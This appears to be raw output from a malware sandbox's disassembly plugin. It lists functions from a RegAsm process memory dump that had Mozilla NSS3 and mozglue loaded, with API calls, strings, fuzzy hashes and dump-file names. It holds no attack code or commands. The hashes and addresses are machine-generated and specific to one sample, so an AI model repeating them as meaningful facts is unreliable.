Instruction ID: 5aab40f20926983ed80c2b8c6dbd055df75c581d18036510bfddefb1c6b17425
Opcode Fuzzy Hash: c77b72a7fa1cc754535442be75815553a58c3b906c25f6affcaf84952eaab855
Instruction Fuzzy Hash: 26618271A002159FDB04CFA5DC84A6A77B1FF4A318F20812DE91AAB7D1DB31E906CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 6CBD9620 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 103libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6CBD9675
__Init_thread_footer.LIBCMT ref: 6CBD9697
LoadLibraryW.KERNEL32(ntdll.dll), ref: 6CBD96E8
GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6CBD9707
__Init_thread_footer.LIBCMT ref: 6CBD971F
SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6CBD9773

Part of subcall function 6CBFAB89: EnterCriticalSection.KERNEL32(6CC4E370,?,?,?,6CBC34DE,6CC4F6CC,?,?,?,?,?,?,?,6CBC3284), ref: 6CBFAB94
Part of subcall function 6CBFAB89: LeaveCriticalSection.KERNEL32(6CC4E370,?,6CBC34DE,6CC4F6CC,?,?,?,?,?,?,?,6CBC3284,?,?,6CBE56F6), ref: 6CBFABD1

GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6CBD97B7
FreeLibrary.KERNEL32 ref: 6CBD97D0
FreeLibrary.KERNEL32 ref: 6CBD97EB
SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6CBD9824

Strings

MapViewOfFileNuma2, xrefs: 6CBD97B1
ntdll.dll, xrefs: 6CBD96E3
NtMapViewOfSection, xrefs: 6CBD9701
Api-ms-win-core-memory-l1-1-5.dll, xrefs: 6CBD9670

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: Library$AddressCriticalErrorFreeInit_thread_footerLastLoadProcSection$EnterLeave
String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
API String ID: 409848716-3880535382
Opcode ID: 0211c465186d945558dc54e57951decf46408e3a7956321da8e227af5da276a8
Instruction ID: 1ff6f8a8ea5e35ea85c481f8b268ddf4552ac39c22910c289dfd6c1b1bfe4db2
Opcode Fuzzy Hash: 0211c465186d945558dc54e57951decf46408e3a7956321da8e227af5da276a8
Instruction Fuzzy Hash: 8D41B175B002459FDF00EFA5D994A9A7BB4EB49319F01C128ED1597740EB34E819CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 6CD46DB0 Relevance: 15.2, APIs: 10, Instructions: 200memoryCOMMON

Download Yara Rule

APIs

SECITEM_ArenaDupItem_Util.NSS3(?,6CD47D8F,6CD47D8F,?,?), ref: 6CD46DC8

Part of subcall function 6CD9FDF0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6CD9FE08
Part of subcall function 6CD9FDF0: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6CD9FE1D
Part of subcall function 6CD9FDF0: memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6CD9FE62

PORT_ArenaAlloc_Util.NSS3(?,00000010,?,?,6CD47D8F,?,?), ref: 6CD46DD5

Part of subcall function 6CDA10C0: TlsGetValue.KERNEL32(?,6CD48802,00000000,00000008,?,6CD3EF74,00000000), ref: 6CDA10F3
Part of subcall function 6CDA10C0: EnterCriticalSection.KERNEL32(?,?,6CD48802,00000000,00000008,?,6CD3EF74,00000000), ref: 6CDA110C
Part of subcall function 6CDA10C0: PL_ArenaAllocate.NSS3(?,?,?,6CD48802,00000000,00000008,?,6CD3EF74,00000000), ref: 6CDA1141
Part of subcall function 6CDA10C0: PR_Unlock.NSS3(?,?,?,6CD48802,00000000,00000008,?,6CD3EF74,00000000), ref: 6CDA1182
Part of subcall function 6CDA10C0: TlsGetValue.KERNEL32(?,6CD48802,00000000,00000008,?,6CD3EF74,00000000), ref: 6CDA119C

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CE68FA0,00000000,?,?,?,?,6CD47D8F,?,?), ref: 6CD46DF7

Part of subcall function 6CD9B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CE718D0,?), ref: 6CD9B095

SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6CD46E35

Part of subcall function 6CD9FDF0: PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6CD9FE29
Part of subcall function 6CD9FDF0: PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6CD9FE3D
Part of subcall function 6CD9FDF0: free.MOZGLUE(00000000,?,?,?,?), ref: 6CD9FE6F

PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6CD46E4C

Part of subcall function 6CDA10C0: PL_ArenaAllocate.NSS3(?,6CD48802,00000000,00000008,?,6CD3EF74,00000000), ref: 6CDA116E

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CE68FE0,00000000), ref: 6CD46E82

Part of subcall function 6CD46AF0: SECITEM_ArenaDupItem_Util.NSS3(00000000,6CD4B21D,00000000,00000000,6CD4B219,?,6CD46BFB,00000000,?,00000000,00000000,?,?,?,6CD4B21D), ref: 6CD46B01
Part of subcall function 6CD46AF0: SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,00000000), ref: 6CD46B8A

SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6CD46F1E
PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6CD46F35
SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CE68FE0,00000000), ref: 6CD46F6B
PR_SetError.NSS3(FFFFE005,00000000,6CD47D8F,?,?), ref: 6CD46FE1

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: Util$Arena$Item_$Alloc_$DecodeQuick$AllocateErrorValue$CriticalEnterSectionUnlockfreememcpy
String ID:
API String ID: 587344769-0
Opcode ID: cb0d6cca04fe14e1da5892f47f8ea47903a3fe4916b8c5f50bc7b353f828f1b1
Instruction ID: 506ec86ef1b61c25ab6fe4554077ecdc9de3c5bf783fcd2fbd6ed795c9c6a222
Opcode Fuzzy Hash: cb0d6cca04fe14e1da5892f47f8ea47903a3fe4916b8c5f50bc7b353f828f1b1
Instruction Fuzzy Hash: 14719071E10646ABDB00CF25CD40AAE7BF4BF95308F158229E949D7B21F770E995CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6CD80FE0 Relevance: 15.2, APIs: 10, Instructions: 192memorystringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CD81057
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CD81085
PK11_GetAllTokens.NSS3 ref: 6CD810B1
free.MOZGLUE(?), ref: 6CD81107
PR_SetError.NSS3(00000000,00000000), ref: 6CD81172
free.MOZGLUE(?), ref: 6CD81182
free.MOZGLUE(?), ref: 6CD811A6
SECITEM_ItemsAreEqual_Util.NSS3(?,?), ref: 6CD811C5

Part of subcall function 6CD852C0: TlsGetValue.KERNEL32(?,00000001,00000002,?,?,?,?,?,?,?,?,?,?,6CD5EAC5,00000001), ref: 6CD852DF
Part of subcall function 6CD852C0: EnterCriticalSection.KERNEL32(?), ref: 6CD852F3
Part of subcall function 6CD852C0: PR_Unlock.NSS3(?), ref: 6CD85358

PORT_ZAlloc_Util.NSS3(0000000C), ref: 6CD811D3
PORT_ZAlloc_Util.NSS3(0000000C), ref: 6CD811F3

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: Utilfree$Alloc_Error$CriticalEnterEqual_ItemsK11_SectionTokensUnlockValuestrlen
String ID:
API String ID: 1549229083-0
Opcode ID: 76c6b33bc57d6acc6f25b4dc0571298efba12f8b32597c638abb9ff6a404acc4
Instruction ID: 324e9cc64a77597312376c4625b49244ac61cf0480ab657399729fef7ae75fa9
Opcode Fuzzy Hash: 76c6b33bc57d6acc6f25b4dc0571298efba12f8b32597c638abb9ff6a404acc4
Instruction Fuzzy Hash: EB6193B0E02345DBEB00DF65DC41BAAB7B5BF04348F144129EC29AB761EB71E948CB61

Uniqueness

Uniqueness Score: -1.00%

Function 6CD8ADC0 Relevance: 15.1, APIs: 10, Instructions: 148COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,6CD6CDBB,?,6CD6D079,00000000,00000001), ref: 6CD8AE10
EnterCriticalSection.KERNEL32(?,?,6CD6CDBB,?,6CD6D079,00000000,00000001), ref: 6CD8AE24
PR_Unlock.NSS3(?,?,?,?,?,?,6CD6D079,00000000,00000001), ref: 6CD8AE5A
memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6CD6CDBB,?,6CD6D079,00000000,00000001), ref: 6CD8AE6F
free.MOZGLUE(85145F8B,?,?,?,?,6CD6CDBB,?,6CD6D079,00000000,00000001), ref: 6CD8AE7F
TlsGetValue.KERNEL32(?,6CD6CDBB,?,6CD6D079,00000000,00000001), ref: 6CD8AEB1
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6CD6CDBB,?,6CD6D079,00000000,00000001), ref: 6CD8AEC9
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6CD6CDBB,?,6CD6D079,00000000,00000001), ref: 6CD8AEF1
free.MOZGLUE(6CD6CDBB,?,?,?,?,?,?,?,?,?,?,?,?,?,6CD6CDBB,?), ref: 6CD8AF0B
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6CD6CDBB,?,6CD6D079,00000000,00000001), ref: 6CD8AF30

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: Unlock$CriticalEnterSectionValuefree$memset
String ID:
API String ID: 161582014-0
Opcode ID: 02d3002ac9dc90cd0b83b409da6d91d02974d2ffa9cb8247df9fecddf6376bcd
Instruction ID: b5cc48db762e449dd12346590414ff804dfa3387d88958fdfd52e63efbccd427
Opcode Fuzzy Hash: 02d3002ac9dc90cd0b83b409da6d91d02974d2ffa9cb8247df9fecddf6376bcd
Instruction Fuzzy Hash: 6A515DB1A02602EFDB01DF25D884B5AB7B4FF09318F144665E81D97A61E731F864CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6CD64CA0 Relevance: 15.1, APIs: 10, Instructions: 142COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,00000000,00000000,?,6CD6AB7F,?,00000000,?), ref: 6CD64CB4
EnterCriticalSection.KERNEL32(0000001C,?,6CD6AB7F,?,00000000,?), ref: 6CD64CC8
TlsGetValue.KERNEL32(?,6CD6AB7F,?,00000000,?), ref: 6CD64CE0
EnterCriticalSection.KERNEL32(?,?,6CD6AB7F,?,00000000,?), ref: 6CD64CF4
PL_HashTableLookup.NSS3(?,?,?,6CD6AB7F,?,00000000,?), ref: 6CD64D03
PR_Unlock.NSS3(?,00000000,?), ref: 6CD64D10

Part of subcall function 6CDEDD70: TlsGetValue.KERNEL32 ref: 6CDEDD8C
Part of subcall function 6CDEDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CDEDDB4

PR_Now.NSS3(?,00000000,?), ref: 6CD64D26

Part of subcall function 6CE09DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6CE50A27), ref: 6CE09DC6
Part of subcall function 6CE09DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6CE50A27), ref: 6CE09DD1
Part of subcall function 6CE09DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CE09DED

PR_Unlock.NSS3(?,?,00000000,?), ref: 6CD64D98
PR_Unlock.NSS3(?,?,?,00000000,?), ref: 6CD64DDA
PR_Unlock.NSS3(?,?,?,?,00000000,?), ref: 6CD64E02

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: Unlock$CriticalSectionTimeValue$EnterSystem$FileHashLeaveLookupTableUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 4032354334-0
Opcode ID: 4b9b2bb47bc09017e4cb92a9e4e7cd9295213710304d687354be01f691374963
Instruction ID: 39a68c49dc20aa8a7d11cf5b805592268ca8b64ef09962761470d1024bf1569d
Opcode Fuzzy Hash: 4b9b2bb47bc09017e4cb92a9e4e7cd9295213710304d687354be01f691374963
Instruction Fuzzy Hash: 514187B5E002059BEB01AF65EC5496677B8AF06259F454171EC0887F32FB31D929CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6CBC1E90 Relevance: 15.1, APIs: 9, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6CC4E784), ref: 6CBC1EC1
LeaveCriticalSection.KERNEL32(6CC4E784), ref: 6CBC1EE1
EnterCriticalSection.KERNEL32(6CC4E744), ref: 6CBC1F38
LeaveCriticalSection.KERNEL32(6CC4E744), ref: 6CBC1F5C
VirtualFree.KERNEL32(?,00100000,00004000), ref: 6CBC1F83
LeaveCriticalSection.KERNEL32(6CC4E784), ref: 6CBC1FC0
EnterCriticalSection.KERNEL32(6CC4E784), ref: 6CBC1FE2
LeaveCriticalSection.KERNEL32(6CC4E784), ref: 6CBC1FF6
memset.VCRUNTIME140(00000000,00000000,?), ref: 6CBC2019

Strings

MOZ_CRASH(), xrefs: 6CBC2000

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: CriticalSection$Leave$Enter$FreeVirtualmemset
String ID: MOZ_CRASH()
API String ID: 2055633661-2608361144
Opcode ID: f6f60ae7f28461d87ef39f309018964fd49a136564e137313b809f8ac1e99c56
Instruction ID: 2116b64ce83258ddb041d4feef6f70b5ce677ba7cf343b13f3ed7ce5180d1634
Opcode Fuzzy Hash: f6f60ae7f28461d87ef39f309018964fd49a136564e137313b809f8ac1e99c56
Instruction Fuzzy Hash: FC41D375B043558BDF00EF78C898B6E7AB5EF4A358F05C029E914A7741EB7198048BD2

Uniqueness

Uniqueness Score: -1.00%

Function 6CD42E00 Relevance: 15.1, APIs: 10, Instructions: 78COMMON

Download Yara Rule

APIs

SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6CD42CDA,?,00000000), ref: 6CD42E1E

Part of subcall function 6CD9FD80: PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6CD49003,?), ref: 6CD9FD91
Part of subcall function 6CD9FD80: PORT_Alloc_Util.NSS3(A4686CDA,?), ref: 6CD9FDA2
Part of subcall function 6CD9FD80: memcpy.VCRUNTIME140(00000000,12D068C3,A4686CDA,?,?), ref: 6CD9FDC4

SECITEM_DupItem_Util.NSS3(?), ref: 6CD42E33

Part of subcall function 6CD9FD80: free.MOZGLUE(00000000,?,?), ref: 6CD9FDD1

TlsGetValue.KERNEL32 ref: 6CD42E4E
EnterCriticalSection.KERNEL32(?), ref: 6CD42E5E
PL_HashTableLookup.NSS3(?), ref: 6CD42E71
PL_HashTableRemove.NSS3(?), ref: 6CD42E84
PL_HashTableAdd.NSS3(?,00000000), ref: 6CD42E96
PR_Unlock.NSS3 ref: 6CD42EA9
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CD42EB6
PR_SetError.NSS3(FFFFE013,00000000), ref: 6CD42EC5

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: Util$HashItem_Table$Alloc_$CriticalEnterErrorLookupRemoveSectionUnlockValueZfreefreememcpy
String ID:
API String ID: 3332421221-0
Opcode ID: ef05c30d2fa567722989a0af5ea7df927be4defa8c6ec0dd7d8b5509d076315f
Instruction ID: 2505ff3d1e8b7c042606b37654d52586b0a23dfe2d37ad89b9eccc20ffd464f7
Opcode Fuzzy Hash: ef05c30d2fa567722989a0af5ea7df927be4defa8c6ec0dd7d8b5509d076315f
Instruction Fuzzy Hash: BF210776A00101ABEF002B66EC49E9F3A74EB5234DF084430EE1CD6731FB32D558D6A1

Uniqueness

Uniqueness Score: -1.00%

Function 6CC25FF0 Relevance: 15.1, APIs: 10, Instructions: 76COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 6CC26009
??0PrintfTarget@mozilla@@IAE@XZ.MOZGLUE ref: 6CC26024
?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(6CBCEE51,?), ref: 6CC26046
OutputDebugStringA.KERNEL32(?,6CBCEE51,?), ref: 6CC26061
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6CC26069
_fileno.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6CC26073
_dup.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6CC26082
_fdopen.API-MS-WIN-CRT-MATH-L1-1-0(00000000,6CC4148E), ref: 6CC26091
__stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,6CBCEE51,00000000,?), ref: 6CC260BA
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6CC260C4

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: PrintfTarget@mozilla@@$?vprint@DebugDebuggerOutputPresentString__acrt_iob_func__stdio_common_vfprintf_dup_fdopen_filenofclose
String ID:
API String ID: 3835517998-0
Opcode ID: edea3abbb8ab390d1b0cae4b5e7e3a4339f3c2ec8d14f26c48ae312d5490ba6f
Instruction ID: c70d37144bd2098c735323a2ff203b7c3a003e51c9673c9afe3b1553c6bb929e
Opcode Fuzzy Hash: edea3abbb8ab390d1b0cae4b5e7e3a4339f3c2ec8d14f26c48ae312d5490ba6f
Instruction Fuzzy Hash: AE21B575A002089FDF106F24DC09AAE7BB8FF45758F00C428E85E97641DB74A659CFE5

Uniqueness

Uniqueness Score: -1.00%

Function 6CCCCEC0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 199COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A7E,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6CCCB999), ref: 6CCCCFF3
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000109DA,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6CCCB999), ref: 6CCCD02B
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A70,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,00000000,?,?,6CCCB999), ref: 6CCCD041
_byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,6CCCB999), ref: 6CE1972B

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CCCCFDD, 6CCCD00E, 6CCCD022, 6CCCD033, 6CE19780
database corruption, xrefs: 6CCCCFE7, 6CCCD013, 6CCCD028, 6CCCD039, 6CCCD03E, 6CE19786
%s at line %d of [%.10s], xrefs: 6CCCCFEC, 6CCCD018, 6CCCD029, 6CCCD03F, 6CE1978B

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: sqlite3_log$_byteswap_ushort
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 491875419-598938438
Opcode ID: f38cc421e2445cc39a112ad91147431621cd77adbfcaf301fd8a5a735f0e375c
Instruction ID: 91b3c247347c426735e71b4e8901fd2200cbe81aa85ab914adef5b2e1b2d51c6
Opcode Fuzzy Hash: f38cc421e2445cc39a112ad91147431621cd77adbfcaf301fd8a5a735f0e375c
Instruction Fuzzy Hash: 66610771A042108BD720CF29C841BA6B7F5FF95318F2845ADE4499FB82E376D947C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 6CBD7E90 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 116stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CBD7EA7
malloc.MOZGLUE(00000001), ref: 6CBD7EB3

Part of subcall function 6CBDCAB0: EnterCriticalSection.KERNEL32(?), ref: 6CBDCB49
Part of subcall function 6CBDCAB0: LeaveCriticalSection.KERNEL32(?), ref: 6CBDCBB6

strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,00000000), ref: 6CBD7EC4
mozalloc_abort.MOZGLUE(?), ref: 6CBD7F19
malloc.MOZGLUE(?), ref: 6CBD7F36
memcpy.VCRUNTIME140(00000000,?,?), ref: 6CBD7F4D

Strings

d, xrefs: 6CBD7F89

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: CriticalSectionmalloc$EnterLeavememcpymozalloc_abortstrlenstrncpy
String ID: d
API String ID: 204725295-2564639436
Opcode ID: 6a4bee348d48f4e09d4bba3923917ae417f104cfe44d4aa32fdd057944990961
Instruction ID: 2233b74dff741a639f9dfcfbb9cc372ffb012289ceb17d3f8fc362901cbd1ac6
Opcode Fuzzy Hash: 6a4bee348d48f4e09d4bba3923917ae417f104cfe44d4aa32fdd057944990961
Instruction Fuzzy Hash: 7C31F671E1039897DF00DB68DC449FEB778EF96208F059668EC495B612FB71A9C8C391

Uniqueness

Uniqueness Score: -1.00%

Function 6CD7ACC0 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 76COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_MessageDecryptFinal), ref: 6CD7ACE6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CD7AD14
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CD7AD23

Part of subcall function 6CE5D930: PL_strncpyz.NSS3(?,?,?), ref: 6CE5D963

PR_LogPrint.NSS3(?,00000000), ref: 6CD7AD39

Strings

(CK_INVALID_HANDLE), xrefs: 6CD7AD1C
hSession = 0x%x, xrefs: 6CD7ACFE, 6CD7AD0E
nl, xrefs: 6CD7AD51, 6CD7AD7B
C_MessageDecryptFinal, xrefs: 6CD7ACE1

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

